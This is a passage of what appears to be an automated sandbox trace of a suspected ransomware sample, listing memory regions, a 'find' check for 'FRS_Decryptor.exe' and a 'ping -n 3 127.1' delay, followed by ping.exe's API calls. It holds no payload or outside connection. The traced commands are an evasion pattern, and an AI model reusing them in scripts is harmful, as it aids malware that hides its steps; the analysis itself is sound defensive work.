7706 start_va = 0x75700000 end_va = 0x7577cfff entry_point = 0x75700000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 7707 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7708 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7709 start_va = 0x76c50000 end_va = 0x76d5bfff entry_point = 0x76c50000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 7710 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 7711 start_va = 0x76d70000 end_va = 0x76db0fff entry_point = 0x76d70000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 7712 start_va = 0x76dc0000 end_va = 0x76de4fff entry_point = 0x76dc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7713 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7714 start_va = 0x76ec0000 end_va = 0x76fc7fff entry_point = 0x76ec0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 7715 start_va = 0x7f730000 end_va = 0x7f82ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f730000" filename = "" Region: id = 7716 start_va = 0x7f856000 end_va = 0x7f858fff entry_point = 0x0 region_type = private name = "private_0x000000007f856000" filename = "" Thread: id = 413 os_tid = 0x93c Thread: id = 415 os_tid = 0x9e4 Thread: id = 416 os_tid = 0x4f0 Thread: id = 417 os_tid = 0x938 Process: id = "149" image_name = "find.exe" filename = "c:\\windows\\syswow64\\find.exe" page_root = "0x1026e000" os_pid = "0x840" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "147" os_parent_pid = "0xbb4" cmd_line = "find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7633 start_va = 0x720000 end_va = 0x73ffff entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7634 start_va = 0x740000 end_va = 0x741fff entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 7635 start_va = 0x750000 end_va = 0x75efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 7636 start_va = 0x760000 end_va = 0x79ffff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 7637 start_va = 0x7a0000 end_va = 0x7dffff entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 7638 start_va = 0x7e0000 end_va = 0x7e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 7639 start_va = 0x7f0000 end_va = 0x7f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 7640 start_va = 0x800000 end_va = 0x801fff entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 7641 start_va = 0x11c0000 end_va = 0x11c6fff entry_point = 0x11c0000 region_type = mapped_file name = "find.exe" filename = "\\Windows\\SysWOW64\\find.exe" (normalized: "c:\\windows\\syswow64\\find.exe") Region: id = 7642 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7643 start_va = 0x7eb40000 end_va = 0x7eb62fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eb40000" filename = "" Region: id = 7644 start_va = 0x7eb69000 end_va = 0x7eb6bfff entry_point = 0x0 region_type = private name = "private_0x000000007eb69000" filename = "" Region: id = 7645 start_va = 0x7eb6c000 end_va = 0x7eb6cfff entry_point = 0x0 region_type = private name = "private_0x000000007eb6c000" filename = "" Region: id = 7646 start_va = 0x7eb6d000 end_va = 0x7eb6dfff entry_point = 0x0 region_type = private name = "private_0x000000007eb6d000" filename = "" Region: id = 7647 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7648 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7649 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7650 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 7655 start_va = 0x900000 end_va = 0x90ffff entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 7656 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7657 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7658 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Thread: id = 414 os_tid = 0x928 Process: id = "150" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0xfa7c000" os_pid = "0x934" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "ping -n 3 127.1" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7717 start_va = 0x7e0000 end_va = 0x7fffff entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 7718 start_va = 0x800000 end_va = 0x801fff entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 7719 start_va = 0x810000 end_va = 0x81efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 7720 start_va = 0x820000 end_va = 0x85ffff entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 7721 start_va = 0x860000 end_va = 0x89ffff entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 7722 start_va = 0x8a0000 end_va = 0x8a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 7723 start_va = 0x8b0000 end_va = 0x8b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 7724 start_va = 0x8c0000 end_va = 0x8c1fff entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 7725 start_va = 0x940000 end_va = 0x948fff entry_point = 0x940000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\SysWOW64\\PING.EXE" (normalized: "c:\\windows\\syswow64\\ping.exe") Region: id = 7726 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7727 start_va = 0x7ec40000 end_va = 0x7ec62fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ec40000" filename = "" Region: id = 7728 start_va = 0x7ec67000 end_va = 0x7ec69fff entry_point = 0x0 region_type = private name = "private_0x000000007ec67000" filename = "" Region: id = 7729 start_va = 0x7ec6a000 end_va = 0x7ec6afff entry_point = 0x0 region_type = private name = "private_0x000000007ec6a000" filename = "" Region: id = 7730 start_va = 0x7ec6e000 end_va = 0x7ec6efff entry_point = 0x0 region_type = private name = "private_0x000000007ec6e000" filename = "" Region: id = 7731 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7732 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7733 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7734 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 7735 start_va = 0x9d0000 end_va = 0x9dffff entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 7736 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7737 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7738 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7739 start_va = 0x7e0000 end_va = 0x7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 7740 start_va = 0x7f0000 end_va = 0x7f3fff entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 7741 start_va = 0x950000 end_va = 0x9cdfff entry_point = 0x950000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7742 start_va = 0xae0000 end_va = 0xbdffff entry_point = 0x0 region_type = private name = "private_0x0000000000ae0000" filename = "" Region: id = 7743 start_va = 0xda0000 end_va = 0xdaffff entry_point = 0x0 region_type = private name = "private_0x0000000000da0000" filename = "" Region: id = 7744 start_va = 0x73db0000 end_va = 0x73db7fff entry_point = 0x73db0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 7745 start_va = 0x73dc0000 end_va = 0x73dddfff entry_point = 0x73dc0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 7746 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7747 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7748 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7749 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7750 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 7751 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7752 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7753 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7754 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 7755 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7756 start_va = 0x7eb40000 end_va = 0x7ec3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eb40000" filename = "" Region: id = 7757 start_va = 0x8d0000 end_va = 0x90ffff entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 7758 start_va = 0x9e0000 end_va = 0xa1ffff entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 7759 start_va = 0x7ec64000 end_va = 0x7ec66fff entry_point = 0x0 region_type = private name = "private_0x000000007ec64000" filename = "" Region: id = 7760 start_va = 0x73690000 end_va = 0x736d4fff entry_point = 0x73690000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 7761 start_va = 0x800000 end_va = 0x802fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 7762 start_va = 0x910000 end_va = 0x910fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000910000" filename = "" Region: id = 7763 start_va = 0x920000 end_va = 0x922fff entry_point = 0x920000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ping.exe.mui") Region: id = 7764 start_va = 0xa20000 end_va = 0xa5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 7765 start_va = 0xa60000 end_va = 0xa9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 7766 start_va = 0x7eb3d000 end_va = 0x7eb3ffff entry_point = 0x0 region_type = private name = "private_0x000000007eb3d000" filename = "" Thread: id = 418 os_tid = 0x92c [0135.952] GetModuleHandleA (lpModuleName=0x0) returned 0x940000 [0135.952] __set_app_type (_Type=0x1) [0135.952] __p__fmode () returned 0x76ea1768 [0135.952] __p__commode () returned 0x76ea176c [0135.952] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x943229) returned 0x0 [0135.952] __wgetmainargs (in: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0, _DoWildCard=0, _StartInfo=0x9440dc | out: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0) returned 0 [0135.953] SetThreadUILanguage (LangId=0x0) returned 0x409 [0135.954] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0135.954] _fileno (_File=0x76ea4c28) returned 1 [0135.954] _get_osfhandle (_FileHandle=1) returned 0x28 [0135.954] GetFileType (hFile=0x28) returned 0x2 [0135.954] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x89eea8 | out: lpMode=0x89eea8) returned 0 [0135.954] GetLastError () returned 0x6 [0135.954] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x89ee0c, nSize=0x50 | out: lpBuffer="䤐®") returned 0x0 [0135.954] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x945500 | out: lpWSAData=0x945500) returned 0 [0135.956] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x89eec4 | out: phkResult=0x89eec4*=0x88) returned 0x0 [0135.957] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x89eeb8, lpData=0x89eec0, lpcbData=0x89eebc*=0x4 | out: lpType=0x89eeb8*=0x0, lpData=0x89eec0*=0x0, lpcbData=0x89eebc*=0x4) returned 0x2 [0135.957] RegCloseKey (hKey=0x88) returned 0x0 [0135.957] GetAddrInfoW (in: pNodeName="127.1", pServiceName=0x0, pHints=0x89ee88*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x89eec4 | out: ppResult=0x89eec4*=0xaec4d0*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xae8ac0*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) returned 0 [0135.957] FreeAddrInfoW (pAddrInfo=0xaec4d0*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xae8ac0*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) [0135.957] IcmpCreateFile () returned 0xae6d40 [0135.960] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0xaec188 [0135.960] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0xaf5270 [0135.960] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x89efc0, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0135.961] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274b, dwLanguageId=0x0, lpBuffer=0x89eeb8, nSize=0x0, Arguments=0x89eeb4 | out: lpBuffer="竈¯\x89┗\x94䰨盪❋") returned 0x14 [0135.961] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0135.961] _fileno (_File=0x76ea4c28) returned 1 [0135.961] _get_osfhandle (_FileHandle=1) returned 0x28 [0135.961] GetFileType (hFile=0x28) returned 0x2 [0135.961] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x89ee7c | out: lpMode=0x89ee7c) returned 0 [0135.962] GetLastError () returned 0x6 [0135.962] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x89ede0, nSize=0x50 | out: lpBuffer="\x89❋") returned 0x0 [0135.962] _fileno (_File=0x76ea4c28) returned 1 [0135.962] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0135.962] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0135.962] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0xaf7b00 [0135.962] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0xaf7b00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPinging 127.0.0.1 ", lpUsedDefaultChar=0x0) returned 21 [0135.962] _fileno (_File=0x76ea4c28) returned 1 [0135.962] _write (in: _FileHandle=1, _Buf=0xaf7b00*, _MaxCharCount=0x14 | out: _Buf=0xaf7b00*) returned 20 [0135.962] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0135.962] _fileno (_File=0x76ea4c28) returned 1 [0135.962] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0135.962] LocalFree (hMem=0xaf7b00) returned 0x0 [0135.962] LocalFree (hMem=0xaf7ac8) returned 0x0 [0135.962] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x89eeb8, nSize=0x0, Arguments=0x89eeb4 | out: lpBuffer="竈¯\x89▪\x94䰨盪❚") returned 0x18 [0135.962] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0135.962] _fileno (_File=0x76ea4c28) returned 1 [0135.962] _get_osfhandle (_FileHandle=1) returned 0x28 [0135.962] GetFileType (hFile=0x28) returned 0x2 [0135.962] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x89ee7c | out: lpMode=0x89ee7c) returned 0 [0135.962] GetLastError () returned 0x6 [0135.962] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x89ede0, nSize=0x50 | out: lpBuffer="\x89❚") returned 0x0 [0135.962] _fileno (_File=0x76ea4c28) returned 1 [0135.962] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0135.962] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0135.962] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0xaec1b0 [0135.962] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0xaec1b0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="with 32 bytes of data:\r\n", lpUsedDefaultChar=0x0) returned 25 [0135.962] _fileno (_File=0x76ea4c28) returned 1 [0135.962] _write (in: _FileHandle=1, _Buf=0xaec1b0*, _MaxCharCount=0x18 | out: _Buf=0xaec1b0*) returned 24 [0135.962] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0135.962] _fileno (_File=0x76ea4c28) returned 1 [0135.962] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0135.962] LocalFree (hMem=0xaec1b0) returned 0x0 [0135.962] LocalFree (hMem=0xaf7ac8) returned 0x0 [0135.962] SetConsoleCtrlHandler (HandlerRoutine=0x941a3d, Add=1) returned 1 [0135.962] IcmpSendEcho2Ex (in: IcmpHandle=0xae6d40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xaec188, RequestSize=0x20, RequestOptions=0x89ef34, ReplyBuffer=0xaf5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xaf5270) returned 0x1 [0135.963] InetNtopW (in: Family=2, pAddr=0x89ef24, pStringBuf=0x89f04c, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0135.963] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x89eeb8, nSize=0x0, Arguments=0x89eeb4 | out: lpBuffer="笈¯\x89⛔\x94䰨盪✣") returned 0x16 [0135.963] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0135.963] _fileno (_File=0x76ea4c28) returned 1 [0135.963] _get_osfhandle (_FileHandle=1) returned 0x28 [0135.963] GetFileType (hFile=0x28) returned 0x2 [0135.963] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x89ee7c | out: lpMode=0x89ee7c) returned 0 [0135.963] GetLastError () returned 0x6 [0135.963] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x89ede0, nSize=0x50 | out: lpBuffer="\x89✣") returned 0x0 [0135.963] _fileno (_File=0x76ea4c28) returned 1 [0135.964] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0135.964] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0135.964] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xaf7b40 [0135.964] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xaf7b40, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0135.964] _fileno (_File=0x76ea4c28) returned 1 [0135.964] _write (in: _FileHandle=1, _Buf=0xaf7b40*, _MaxCharCount=0x16 | out: _Buf=0xaf7b40*) returned 22 [0135.964] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0135.964] _fileno (_File=0x76ea4c28) returned 1 [0135.964] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0135.964] LocalFree (hMem=0xaf7b40) returned 0x0 [0135.964] LocalFree (hMem=0xaf7b08) returned 0x0 [0135.964] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x89eeb8, nSize=0x0, Arguments=0x89eeb4 | out: lpBuffer="笈¯\x89⛿\x94䰨盪✼") returned 0x9 [0135.964] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0135.964] _fileno (_File=0x76ea4c28) returned 1 [0135.964] _get_osfhandle (_FileHandle=1) returned 0x28 [0135.964] GetFileType (hFile=0x28) returned 0x2 [0135.964] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x89ee7c | out: lpMode=0x89ee7c) returned 0 [0135.964] GetLastError () returned 0x6 [0135.964] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x89ede0, nSize=0x50 | out: lpBuffer="\x89✼") returned 0x0 [0135.964] _fileno (_File=0x76ea4c28) returned 1 [0135.964] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0135.964] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0135.964] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xae8910 [0135.964] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xae8910, cbMultiByte=10, lpDefaultChar=0x0, 